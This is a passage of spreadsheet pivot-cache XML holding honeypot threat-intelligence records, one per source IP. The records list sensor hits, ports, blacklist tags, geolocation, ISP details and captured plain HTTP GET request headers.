    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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7a74:155b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3551"/>
    <x v="3551"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:37:05"/>
    <d v="2025-04-01T15:20:44"/>
    <d v="2025-04-02T13:37:05"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Konkan Division"/>
    <s v="Mumbai (Hanuman Nagar)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.1162"/>
    <s v="72.8635"/>
    <s v="45820"/>
    <s v="TTSL-ISP DIVISION"/>
    <s v="Tata Tele Services GSM"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-08-19"/>
    <s v="TATAGSM"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ec3:8f34"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3552"/>
    <x v="3552"/>
    <s v="NA&amp;&amp;59-126-47-168.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T13:36:19"/>
    <d v="2023-12-30T10:15:56"/>
    <d v="2025-04-02T13:36:19"/>
    <n v="407"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_SSH_H15&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;11917&amp;&amp;23&amp;&amp;38761&amp;&amp;51000&amp;&amp;9100&amp;&amp;33569"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7e:2fa8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3553"/>
    <x v="3553"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:12:12"/>
    <d v="2025-04-02T01:41:53"/>
    <d v="2025-04-02T13:12:12"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'spamsources.fabel.dk': ['unknown']}"/>
    <n v="77"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:66a0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3554"/>
    <x v="3554"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:08:32"/>
    <d v="2023-07-27T04:11:29"/>
    <d v="2025-04-02T13:08:32"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="25433&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NIB"/>
    <s v="2007-08-01"/>
    <s v="BSNLNET"/>
    <s v="None"/>
    <s v="None"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ce:b5f0"/>
    <s v="None"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3555"/>
    <x v="3555"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:03:39"/>
    <d v="2025-04-02T13:03:39"/>
    <d v="2025-04-02T13:03:39"/>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harat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:4813"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3556"/>
    <x v="3556"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T13:02:35"/>
    <d v="2025-04-02T13:02:35"/>
    <d v="2025-04-02T13:02:35"/>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d5:30e3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3557"/>
    <x v="3557"/>
    <s v="59-126-87-86.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:28:46"/>
    <d v="2024-07-09T17:40:00"/>
    <d v="2025-04-02T12:28:46"/>
    <n v="663"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H29&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;51449&amp;&amp;23&amp;&amp;50191&amp;&amp;50214&amp;&amp;80&amp;&amp;9100&amp;&amp;48661"/>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one"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7e:5756"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3558"/>
    <x v="3558"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:26:04"/>
    <d v="2025-01-24T07:41:26"/>
    <d v="2025-04-02T12:26:04"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation"/>
    <s v="business"/>
    <s v="RAILTEL"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca8c:830b"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3559"/>
    <x v="3559"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:23:07"/>
    <d v="2025-04-02T03:05:59"/>
    <d v="2025-04-02T12:23:07"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1"/>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None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c7:db55"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3560"/>
    <x v="3560"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:18:08"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-02T12:18:08"/>
    <n v="58"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;40821&amp;&amp;8953&amp;&amp;40822"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="30"/>
    <s v="Kyiv City"/>
    <s v="Kyiv City"/>
    <s v="Kyiv"/>
    <s v="703448"/>
    <s v="NA"/>
    <s v="50.4504"/>
    <s v="30.5245"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2011-11-07"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:86f9:ca9c"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3561"/>
    <x v="3561"/>
    <s v="220-133-66-155.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:14:19"/>
    <d v="2024-09-06T15:56:00"/>
    <d v="2025-04-02T12:14:19"/>
    <n v="617"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;29757&amp;&amp;23&amp;&amp;NA&amp;&amp;37086&amp;&amp;9100"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dc85:429b"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3562"/>
    <x v="3562"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T12:11:41"/>
    <d v="2025-04-02T12:11:41"/>
    <d v="2025-04-02T12:11:41"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="Wimax Project"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:9078"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3563"/>
    <x v="3563"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:58:43"/>
    <d v="2025-04-02T11:58:43"/>
    <d v="2025-04-02T11:58:43"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d1:ca97"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3564"/>
    <x v="3564"/>
    <s v="125-229-146-44.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:55:14"/>
    <d v="2023-09-17T09:10:16"/>
    <d v="2025-04-02T11:55:14"/>
    <n v="839"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H22&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;30219&amp;&amp;23&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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7de5:922c"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3565"/>
    <x v="3565"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T11:46:35"/>
    <d v="2024-12-04T07:59:15"/>
    <d v="2025-04-02T11:46:35"/>
    <n v="38"/>
    <s v="SQTK_GTDN"/>
